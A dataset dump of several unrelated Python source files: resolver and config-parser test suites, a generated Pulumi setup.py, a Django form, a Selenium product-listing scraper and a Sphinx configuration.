== "Yes"
)
def test_answer_source_with_list_item_selector_location_none():
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore(
[
{
"answer_id": "some-answer",
"list_item_id": "item-1",
"value": "Yes",
}
]
),
location=None,
)
with pytest.raises(InvalidLocationException):
value_source_resolver.resolve(
{
"source": "answers",
"identifier": "some-answer",
"list_item_selector": {"source": "location", "id": "list_item_id"},
}
)
def test_answer_source_with_list_item_selector_list_first_item():
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore(
[
{
"answer_id": "some-answer",
"list_item_id": "item-1",
"value": "Yes",
}
]
),
list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
)
assert (
value_source_resolver.resolve(
{
"source": "answers",
"identifier": "some-answer",
"list_item_selector": {
"source": "list",
"identifier": "some-list",
"selector": "first",
},
}
)
== "Yes"
)
def test_answer_source_outside_of_repeating_section():
schema = get_mock_schema()
schema.is_repeating_answer = Mock(return_value=False)
answer_store = AnswerStore([{"answer_id": "some-answer", "value": "Yes"}])
value_source_resolver = get_value_source_resolver(
schema=schema,
answer_store=answer_store,
list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
location=Location(
section_id="some-section", block_id="some-block", list_item_id="item-1"
),
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "some-answer"}
)
== "Yes"
)
@pytest.mark.parametrize("is_answer_on_path", [True, False])
def test_answer_source_not_on_path_non_repeating_section(is_answer_on_path):
schema = get_mock_schema()
location = Location(section_id="test-section", block_id="test-block")
if is_answer_on_path:
schema.get_block_for_answer_id = Mock(return_value={"id": "block-on-path"})
answer_id = "answer-on-path"
expected_result = "Yes"
else:
schema.get_block_for_answer_id = Mock(return_value={"id": "block-not-on-path"})
answer_id = "answer-not-on-path"
expected_result = None
answer = Answer(answer_id=answer_id, value="Yes")
value_source_resolver = get_value_source_resolver(
schema=schema,
answer_store=AnswerStore([answer.to_dict()]),
list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
location=location,
list_item_id=location.list_item_id,
routing_path_block_ids=["block-on-path"],
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "answer-on-path"}
)
== expected_result
)
@pytest.mark.parametrize("is_answer_on_path", [True, False])
def test_answer_source_not_on_path_repeating_section(is_answer_on_path):
schema = get_mock_schema()
schema.is_repeating_answer = Mock(return_value=True)
location = Location(
section_id="test-section", block_id="test-block", list_item_id="item-1"
)
if is_answer_on_path:
schema.get_block_for_answer_id = Mock(return_value={"id": "block-on-path"})
answer_id = "answer-on-path"
expected_result = "Yes"
else:
schema.get_block_for_answer_id = Mock(return_value={"id": "block-not-on-path"})
answer_id = "answer-not-on-path"
expected_result = None
answer = Answer(answer_id=answer_id, list_item_id="item-1", value="Yes")
value_source_resolver = get_value_source_resolver(
schema=schema,
answer_store=AnswerStore([answer.to_dict()]),
list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
location=location,
list_item_id=location.list_item_id,
routing_path_block_ids=["block-on-path"],
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "answer-on-path"}
)
== expected_result
)
@pytest.mark.parametrize("use_default_answer", [True, False])
def test_answer_source_default_answer(use_default_answer):
schema = get_mock_schema()
if use_default_answer:
schema.get_default_answer = Mock(
return_value=Answer(answer_id="some-answer", value="Yes")
)
else:
schema.get_default_answer = Mock(return_value=None)
value_source_resolver = get_value_source_resolver(
schema=schema,
use_default_answer=use_default_answer,
)
expected_result = "Yes" if use_default_answer else None
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "some-answer"}
)
== expected_result
)
@pytest.mark.parametrize(
"metadata_identifier, expected_result",
[("region_code", "GB-ENG"), ("language_code", None)],
)
def test_metadata_source(metadata_identifier, expected_result):
value_source_resolver = get_value_source_resolver(
metadata={"region_code": "GB-ENG"},
)
source = {"source": "metadata", "identifier": metadata_identifier}
assert value_source_resolver.resolve(source) == expected_result
@pytest.mark.parametrize(
"list_count",
[0, 1, 5, 10],
)
def test_list_source(list_count):
value_source_resolver = get_value_source_resolver(
list_store=ListStore(
[{"name": "some-list", "items": get_list_items(list_count)}]
),
)
assert (
value_source_resolver.resolve(
{"source": "list", "identifier": "some-list", "selector": "count"}
)
== list_count
)
def test_list_source_with_id_selector_first():
value_source_resolver = get_value_source_resolver(
list_store=ListStore([{"name": "some-list", "items": get_list_items(3)}]),
)
assert (
value_source_resolver.resolve(
{"source": "list", "identifier": "some-list", "selector": "first"}
)
== "item-1"
)
def test_list_source_with_id_selector_same_name_items():
value_source_resolver = get_value_source_resolver(
list_store=ListStore(
[
{
"name": "some-list",
"items": get_list_items(5),
"same_name_items": get_list_items(3),
}
]
),
)
assert (
value_source_resolver.resolve(
{
"source": "list",
"identifier": "some-list",
"selector": "same_name_items",
}
)
== get_list_items(3)
)
@pytest.mark.parametrize(
"primary_person_list_item_id",
["item-1", "item-2"],
)
def test_list_source_id_selector_primary_person(primary_person_list_item_id):
value_source_resolver = get_value_source_resolver(
list_store=ListStore(
[
{
"name": "some-list",
"primary_person": primary_person_list_item_id,
"items": get_list_items(3),
}
]
),
)
assert (
value_source_resolver.resolve(
{
"source": "list",
"identifier": "some-list",
"selector": "primary_person",
}
)
== primary_person_list_item_id
)
def test_location_source():
value_source_resolver = get_value_source_resolver(list_item_id="item-1")
assert (
value_source_resolver.resolve(
{"source": "location", "identifier": "list_item_id"}
)
== "item-1"
)
def test_response_metadata_source():
value_source_resolver = get_value_source_resolver(
response_metadata={"started_at": "2021-10-11T09:40:11.220038+00:00"}
)
assert (
value_source_resolver.resolve(
{"source": "response_metadata", "identifier": "started_at"}
)
== "2021-10-11T09:40:11.220038+00:00"
)
@pytest.mark.parametrize(
"answer_value, escaped_value",
[
(HTML_CONTENT, ESCAPED_CONTENT),
([HTML_CONTENT, "some value"], [ESCAPED_CONTENT, "some value"]),
(1, 1),
(None, None),
],
)
def test_answer_value_can_be_escaped(answer_value, escaped_value):
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore(
[
{
"answer_id": "some-answer",
"value": answer_value,
}
]
),
escape_answer_values=True,
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "some-answer"}
)
== escaped_value
)
def test_answer_value_with_selector_can_be_escaped():
value_source_resolver = get_value_source_resolver(
answer_store=AnswerStore(
[
{
"answer_id": "some-answer",
"value": {"key_1": HTML_CONTENT, "key_2": 1},
}
]
),
escape_answer_values=True,
)
assert (
value_source_resolver.resolve(
{"source": "answers", "identifier": "some-answer", "selector": "key_1"}
)
== ESCAPED_CONTENT
)
| 28.811024 | 87 | 0.585747 |
2b56986071cac09222bf3493b4e6582683cb2d44 | 1,762 | py | Python | pkg/codegen/testing/test/testdata/plain-and-default/python/setup.py | goverdhan07/pulumi | 301efa60653c90047a3427af41339387223dbccd | [
"Apache-2.0"
] | 12,004 | 2018-06-17T23:56:29.000Z | 2022-03-31T18:00:09.000Z | pkg/codegen/testing/test/testdata/plain-and-default/python/setup.py | goverdhan07/pulumi | 301efa60653c90047a3427af41339387223dbccd | [
"Apache-2.0"
] | 6,263 | 2018-06-17T23:27:24.000Z | 2022-03-31T19:20:35.000Z | pkg/codegen/testing/test/testdata/plain-and-default/python/setup.py | goverdhan07/pulumi | 301efa60653c90047a3427af41339387223dbccd | [
"Apache-2.0"
] | 706 | 2018-06-17T23:56:50.000Z | 2022-03-31T11:20:23.000Z | # coding=utf-8
# *** WARNING: this file was generated by test. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import errno
from setuptools import setup, find_packages
from setuptools.command.install import install
from subprocess import check_call
VERSION = "0.0.0"
PLUGIN_VERSION = "0.0.0"
class InstallPluginCommand(install):
def run(self):
install.run(self)
try:
check_call(['pulumi', 'plugin', 'install', 'resource', 'foobar', PLUGIN_VERSION])
except OSError as error:
if error.errno == errno.ENOENT:
print(f"""
There was an error installing the foobar resource provider plugin.
It looks like `pulumi` is not installed on your system.
Please visit https://pulumi.com/ to install the Pulumi CLI.
You may try manually installing the plugin by running
`pulumi plugin install resource foobar {PLUGIN_VERSION}`
""")
else:
raise
def readme():
try:
with open('README.md', encoding='utf-8') as f:
return f.read()
except FileNotFoundError:
return "foobar Pulumi Package - Development Version"
setup(name='pulumi_foobar',
version=VERSION,
long_description=readme(),
long_description_content_type='text/markdown',
cmdclass={
'install': InstallPluginCommand,
},
packages=find_packages(),
package_data={
'pulumi_foobar': [
'py.typed',
'pulumi-plugin.json',
]
},
install_requires=[
'parver>=0.2.1',
'pulumi',
'semver>=2.8.1'
],
zip_safe=False)
| 29.366667 | 93 | 0.585698 |
4c51c8366d9b541619f497b38b35d7548674254f | 58 | py | Python | edit/models/restorers/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
] | 28 | 2021-03-23T09:00:33.000Z | 2022-03-10T03:55:00.000Z | edit/models/restorers/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
] | 2 | 2021-04-17T20:08:55.000Z | 2022-02-01T17:48:55.000Z | edit/models/restorers/__init__.py | tpoisonooo/basicVSR_mge | 53df836a7dcc075083ef7c9ff7cabea69fec3192 | [
"Apache-2.0"
] | 5 | 2021-05-19T07:35:56.000Z | 2022-01-13T02:11:50.000Z | from .BidirectionalRestorer import BidirectionalRestorer
| 19.333333 | 56 | 0.896552 |
ca5630fc244f181929c18bf90d460051333ae183 | 392 | py | Python | main/forms.py | agilghif/temenin-isoman | 18a768363420709c3a03a7d1453ddd8fa138c8b5 | [
"Unlicense"
] | null | null | null | main/forms.py | agilghif/temenin-isoman | 18a768363420709c3a03a7d1453ddd8fa138c8b5 | [
"Unlicense"
] | null | null | null | main/forms.py | agilghif/temenin-isoman | 18a768363420709c3a03a7d1453ddd8fa138c8b5 | [
"Unlicense"
] | null | null | null | from django import *
from django.forms import ModelForm
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.forms import ModelForm, Textarea, TextInput
from deteksi_mandiri.models import *
class CreateUserForm(UserCreationForm):
class Meta:
model = User
fields = ['username', 'email', 'password1', 'password2']
| 30.153846 | 64 | 0.762755 |
b268ed3d7df9edf69a267fb5fb9a4374f4add36d | 1,420 | py | Python | 17huo.py | ZhongXinWang/python | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | [
"Apache-2.0"
] | null | null | null | 17huo.py | ZhongXinWang/python | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | [
"Apache-2.0"
] | null | null | null | 17huo.py | ZhongXinWang/python | 4cf3ecdc9d9e811e777c6d8408a8319097cfdec3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
import time
'''
打开网页 get()
find_element_by_css_selector() 根据选择器找元素
find_elements_by_tag_name() 根据标签的名字
execute_script() 执行脚本
set_page_load_timeout() #等待超时时间
'''
#指定浏览器的位置
'''
会启动浏览器
browers = webdriver.Chrome()
browers.set_page_load_timeout(30)
print(dir(browers))
'''
#无头浏览器模式
chrome_options = Options()
chrome_options.add_argument('--headless')
browers = webdriver.Chrome(chrome_options=chrome_options)
browers.set_page_load_timeout(30)
#打开浏览器
browers.get('http://www.17huo.com/newsearch/?k=%E5%86%85%E8%A3%A4')
#获取数据
#点击分页,获取下一页的数据
for i in range(3):
print('--------------第%s页-------------' % (i+1))
browers.execute_script('window.scrollTo(0, document.body.scrollHeight);')
goods = browers.find_element_by_css_selector('#book_item_list').find_elements_by_css_selector('.book_item_list_box')
for good in goods:
name = good.find_element_by_css_selector('div.shop_box > div.book_item_mid.clearfix > a').text;
price = good.find_element_by_css_selector('div.shop_box > div.book_item_mid.clearfix > div.book_item_price > span').text;
print('商品名称:%s,商品价格:%s' % (name,price))
nextPage = browers.find_element_by_css_selector('body > div.wrap > div.search_container > div.main_new > div.tcdPageCode.goldPage > a.nextPage');
nextPage.click()
time.sleep(5)
| 30.869565 | 146 | 0.754225 |
64afb0edf416b9ff1b8bc4aacefa53cb1cc02a37 | 9,555 | py | Python | doc/conf.py | sam-at-github/PySCIPOpt | 35775087653e6a920cb21683b7e2922141e8fb01 | [
"MIT"
] | 2 | 2019-04-25T12:56:06.000Z | 2019-04-25T12:56:10.000Z | PySCIPOpt/doc/conf.py | linjc16/TBranT | cc051e386775da87f25964f98547c29dde841362 | [
"MIT"
] | 3 | 2017-07-26T15:24:02.000Z | 2018-07-10T17:08:25.000Z | PySCIPOpt/doc/conf.py | linjc16/TBranT | cc051e386775da87f25964f98547c29dde841362 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# PySCIPOpt documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 5 12:34:03 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'PySCIPOpt'
copyright = '2017, Matthias Miltenberger'
author = 'Matthias Miltenberger'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.2.0'
# The full version, including alpha/beta/rc tags.
release = '1.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'classic'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#html_title = 'PySCIPOpt v1.2.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr', 'zh'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'PySCIPOptdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PySCIPOpt.tex', 'PySCIPOpt Documentation',
'Matthias Miltenberger', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pyscipopt', 'PySCIPOpt Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PySCIPOpt', 'PySCIPOpt Documentation',
author, 'PySCIPOpt', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 32.5 | 80 | 0.717321 |
13cb4ac0e47e4a5c8de3eb48db102ea357216456 | 12,238 | py | Python | tests/test_config.py | modera-manyrepo-packages/mcloud | 8ce3b1cc7bac01682a41c7b9d8d82f13a853d223 | [
"Apache-2.0"
] | null | null | null | tests/test_config.py | modera-manyrepo-packages/mcloud | 8ce3b1cc7bac01682a41c7b9d8d82f13a853d223 | [
"Apache-2.0"
] | null | null | null | tests/test_config.py | modera-manyrepo-packages/mcloud | 8ce3b1cc7bac01682a41c7b9d8d82f13a853d223 | [
"Apache-2.0"
] | null | null | null | from collections import OrderedDict
import os
from flexmock import flexmock
from mcloud.config import YamlConfig, Service, UnknownServiceError, ConfigParseError
from mcloud.container import PrebuiltImageBuilder, DockerfileImageBuilder, InlineDockerfileImageBuilder
import pytest
def test_not_existent_file():
with pytest.raises(ValueError):
YamlConfig(file='Not existent path')
def test_none_to_parser():
YamlConfig()
def test_load_config_prepare():
config = {
'foo': {
'image': 'foo',
'env': {
'bar': 'baz'
},
'cmd': 'some'
},
'bar': {
'extend': 'foo',
'cmd': 'other'
}
}
yc = YamlConfig()
processed = yc.prepare(config)
assert processed['bar'] == {
'image': 'foo',
'env': {
'bar': 'baz'
},
'cmd': 'other'
}
def test_filter_env_non_dict():
"""
pass through non-dict elements
"""
yc = YamlConfig(env='xx')
result = yc.filter_env('foo')
assert result == 'foo'
def test_filter_env_dict_no_env():
"""
pass through dict elements without ~
"""
yc = YamlConfig(env='xx')
flexmock(yc).should_call('filter_env').with_args({'foo': 'bar'}).once()
flexmock(yc).should_call('filter_env').with_args('bar').once()
result = yc.filter_env({'foo': 'bar'})
assert result == {'foo': 'bar'}
def test_filter_env_remove():
"""
~xxx syntax: remove elements that not match
"""
yc = YamlConfig(env='xx')
result = yc.filter_env({
'~foo': 'bar'
})
assert result == {}
def test_filter_env_non_dict_in_match():
"""
~xxx syntax: should contain dict
"""
yc = YamlConfig(env='foo')
with pytest.raises(TypeError):
yc.filter_env({
'~foo': 'bar'
})
def test_filter_env_keep():
"""
~xxx syntax: keep elements that match
"""
yc = YamlConfig(env='foo')
flexmock(yc).should_call('filter_env').with_args({'~foo': {'bar': 'baz'}}).once().and_return({'bar': 'baz'})
flexmock(yc).should_call('filter_env').with_args({'bar': 'baz'}).once().and_return({'bar': 'baz'})
flexmock(yc).should_call('filter_env').with_args('baz').once().and_return('baz')
result = yc.filter_env({
'~foo': {'bar': 'baz'}
})
assert result == {'bar': 'baz'}
def test_load_config_prepare_env():
yc = YamlConfig(env='myenv')
flexmock(yc).should_receive('filter_env').with_args({'foo': {'bar': 'baz'}}).once().and_return({'fas': {'bar': 'baz'}})
processed = yc.prepare({'foo': {'bar': 'baz'}})
assert processed == {'fas': {'bar': 'baz'}}
def test_load_config(tmpdir):
p = tmpdir.join('mcloud.yml')
p.write('foo: bar')
config = YamlConfig(file=p.realpath(), app_name='myapp')
flexmock(config).should_receive('prepare').with_args({'foo': 'bar'}).once().and_return({'foo': 'bar1'})
flexmock(config).should_receive('validate').with_args({'foo': 'bar1'}).once()
flexmock(config).should_receive('process').with_args(OrderedDict([('foo', 'bar1')]), path=None, app_name='myapp', client='booo').once()
config.load(client='booo')
def test_load_config_from_config():
config = YamlConfig(source='{"foo": "bar"}', app_name='myapp')
flexmock(config).should_receive('prepare').with_args({'foo': 'bar'}).once().and_return({'foo': 'bar1'})
flexmock(config).should_receive('validate').with_args({'foo': 'bar1'}).once()
flexmock(config).should_receive('process').with_args(OrderedDict([('foo', 'bar1')]), path=None, app_name='myapp', client='booo').once()
config.load(client='booo')
def test_load_config_not_valid(tmpdir):
p = tmpdir.join('mcloud.yml')
p.write('foo: bar')
config = YamlConfig(file=p.realpath(), app_name='myapp')
flexmock(config).should_receive('prepare').with_args({'foo': 'bar'}).once().and_return({'foo': 'bar1'})
flexmock(config).should_receive('validate').with_args({'foo': 'bar1'}).once().and_raise(ValueError('boo'))
flexmock(config).should_receive('process').times(0)
with pytest.raises(ConfigParseError):
config.load()
@pytest.mark.parametrize("config", [
# one service - image
{
'foo': {
'image': 'boo'
}
},
# one service - build
{
'foo': {
'build': 'boo'
}
},
# one service - full config
{
'foo': {
'image': 'boo',
'env': {
'boo': 'baz',
'boo2': 'baz',
'boo3': 'baz',
},
'volumes': {
'foo1': 'bar1',
'foo2': 'bar2',
'foo3': 'bar3',
}
},
}
])
def test_validate_valid(config):
c = YamlConfig()
assert c.validate(config)
def test_validate_ordered_dict():
c = YamlConfig()
config = OrderedDict([('web', OrderedDict([('image', 'orchardup/nginx'), ('volumes', OrderedDict([('public', '/var/www')]))]))])
assert c.validate(config)
@pytest.mark.parametrize("config", [
# no services
{},
# no image or build
{'foo': {}},
# some random key
{
'foo': {
'build1': 'boo'
}
}
])
def test_validate_invalid(config):
c = YamlConfig()
with pytest.raises(ValueError):
assert c.validate(config)
def test_process():
c = YamlConfig()
flexmock(c)
c.should_receive('process_image_build').once()
c.should_receive('process_volumes_build').once()
c.should_receive('process_command_build').once()
c.process({
'nginx': {'foo': 'bar'}
}, path='foo')
assert isinstance(c.services['nginx'], Service)
assert c.services['nginx'].name == 'nginx'
def test_process_with_app_name():
c = YamlConfig()
flexmock(c)
c.should_receive('process_image_build').once()
c.should_receive('process_volumes_build').once()
c.should_receive('process_command_build').once()
c.process({
'nginx': {'foo': 'bar'}
}, path='foo', app_name='myapp')
assert isinstance(c.services['nginx.myapp'], Service)
assert c.services['nginx.myapp'].name == 'nginx.myapp'
def test_process_with_local_config():
c = YamlConfig(source='{"nginx": {"image": "bar"}, "---": {"commands": {"bar": ["foo"]}}}')
flexmock(c)
c.should_receive('process_local_config').once().with_args({"commands": {"bar": ["foo"]}})
c.load(process=False)
def test_process_local_config_hosts():
c = YamlConfig()
c.process_local_config({'hosts': {'foo': 'bar'}})
assert c.hosts == {'foo': 'bar'}
def test_process_local_config_commands():
c = YamlConfig()
c.process_local_config({'commands': {
'push (Upload code to remove server)': ['sync . {host} --path ticcet/'],
'pull': ['foo', 'bar']
}})
assert c.get_commands() == {
'push': {
'help': 'Upload code to remove server',
'commands': ['sync . {host} --path ticcet/']
},
'pull': {
'help': 'pull command',
'commands': ['foo', 'bar']
}
}
def test_build_command_empty():
s = Service()
c = YamlConfig()
c.process_command_build(s, {}, '/base/path')
assert s.command == None
def test_build_command_none():
s = Service()
c = YamlConfig()
c.process_command_build(s, {'cmd': None}, '/base/path')
assert s.command == None
def test_build_command_empty_string():
s = Service()
c = YamlConfig()
c.process_command_build(s, {'cmd': ''}, '/base/path')
assert s.command == None
def test_build_command_ok():
s = Service()
c = YamlConfig()
c.process_command_build(s, {'cmd': 'ok --some args'}, '/base/path')
assert s.command == 'ok --some args'
def test_build_build_volumes_empty():
s = Service()
c = YamlConfig()
c.process_volumes_build(s, {'volumes': []}, '/base/path')
assert s.volumes == []
def test_build_build_volumes_none():
s = Service()
c = YamlConfig()
c.process_volumes_build(s, {}, '/base/path')
assert s.volumes == []
def test_build_build_volumes_several(tmpdir):
s = Service()
c = YamlConfig()
foo1 = tmpdir.mkdir('foo1')
foo2 = tmpdir.mkdir('foo2')
foo3 = tmpdir.mkdir('foo3')
c.process_volumes_build(s, {'volumes': {
'foo1': 'bar1',
'foo2': 'bar2',
'foo3': 'bar3',
}}, str(tmpdir))
assert s.volumes == [
{'local': str(foo1), 'remote': 'bar1'},
{'local': str(foo2), 'remote': 'bar2'},
{'local': str(foo3), 'remote': 'bar3'}
]
def test_build_build_volumes_single_file(tmpdir):
s = Service()
c = YamlConfig()
tmpdir.join('nginx.conf').write('foo')
c.process_volumes_build(s, {'volumes': {
'nginx.conf': 'bar1',
}}, str(tmpdir))
assert s.volumes == [
{'local': str(tmpdir.join('nginx.conf')), 'remote': 'bar1'},
]
def test_build_build_volumes_basepath(tmpdir):
s = Service()
c = YamlConfig()
c.process_volumes_build(s, {'volumes': {
'.': 'bar1',
}}, str(tmpdir))
assert s.volumes == [
{'local': str(tmpdir), 'remote': 'bar1'},
]
@pytest.mark.parametrize("path,result", [
('/root', '/foo/root'),
('.', '/foo'),
('../', '/foo'),
('../bar/baz/../', '/foo/bar'),
('./././../', '/foo'),
('././some/crazy/something/../../..//../../../../../../../', '/foo'),
('~/', '/foo')
])
def test_build_build_volumes_hackish_paths(path, result):
s = Service()
c = YamlConfig()
c.process_volumes_build(s, {'volumes': {
path: 'bar',
}}, '/foo')
assert s.volumes == [
{'local': result, 'remote': 'bar'},
]
def test_build_build_env_empty():
s = Service()
c = YamlConfig()
c.process_env_build(s, {'env': []}, '/base/path')
assert s.env == {}
def test_build_build_env_none():
s = Service()
c = YamlConfig(env='dev')
c.process_env_build(s, {}, '/base/path')
assert s.env == {'env': 'dev'}
def test_build_build_env_several():
s = Service()
c = YamlConfig(env='prod')
c.process_env_build(s, {'env': {
'foo1': 'bar1',
'foo2': 'bar2',
'foo3': 'bar3',
}}, '/base/path')
assert s.env == {
'env': 'prod',
'foo1': 'bar1',
'foo2': 'bar2',
'foo3': 'bar3',
}
def test_build_image_image():
s = Service()
c = YamlConfig()
c.process_image_build(s, {'image': 'foo/bar'}, '/base/path')
assert isinstance(s.image_builder, PrebuiltImageBuilder)
assert s.image_builder.image == 'foo/bar'
def test_build_image_dockerfile():
s = Service()
c = YamlConfig()
c.process_image_build(s, {'build': 'foo/bar'}, '/base/path')
assert isinstance(s.image_builder, DockerfileImageBuilder)
assert s.image_builder.path == '/base/path/foo/bar'
def test_build_inline_dockerfile():
s = Service()
c = YamlConfig()
c.process_image_build(s, {'dockerfile': 'FROM foo\nWORKDIR boo'}, '/base/path')
assert isinstance(s.image_builder, InlineDockerfileImageBuilder)
assert s.image_builder.files['Dockerfile'] == 'FROM foo\nWORKDIR boo'
def test_build_image_dockerfile_no_path():
s = Service()
c = YamlConfig()
with pytest.raises(ConfigParseError):
c.process_image_build(s, {'build': 'foo/bar'}, None)
def test_build_image_empty():
s = Service()
c = YamlConfig()
with pytest.raises(ValueError) as e:
c.process_image_build(s, {}, '/base/path')
def test_get_service():
c = YamlConfig()
c.services = {'foo': 'bar'}
assert c.get_service('foo') == 'bar'
